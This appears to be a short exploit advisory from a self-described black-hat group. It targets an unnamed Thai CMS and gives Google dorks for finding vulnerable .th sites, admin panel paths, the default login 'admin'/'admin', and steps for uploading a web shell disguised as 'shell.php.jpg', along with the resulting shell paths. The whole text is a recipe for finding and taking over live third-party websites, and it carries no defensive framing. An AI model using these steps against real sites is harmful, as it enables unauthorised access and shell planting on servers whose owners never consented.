##############################################################
# Exploit Title: Thai CMS Administrator Bypass and Shell Upload
# Google Dork 1: inurl:/administrator/modules/mod_photo/
# Google Dork 2: inurl:path/administrator/admin.php site:.th
# Exploit Author: mr.Gh0st N@0b
# Date: 1.6.2018
# Tested on: Window 10
################################################################
# POC
# Search with google dork
# Open url
#
# Admin Panel
# localhost/administrator/admin.phpp
# localhost/path/administrator/admin.phpp
#
# Bypass
# username "admin" password"admin"
# Upload shell.php.jpg with Tamper
#
# Shell Path
# localhost/administrator/modules/mod_photo/myphoto/yourshell.php
# localhost/path/administrator/modules/mod_photo/myphoto/yourshell.php
#####################################################
# mr.Gh0st N@0b
# Myanmar Noob Hackers
# Greetz to All Myanmar Black Hats
# https://www.facebook.com/official.myanmar.noob.hackers/
#####################################################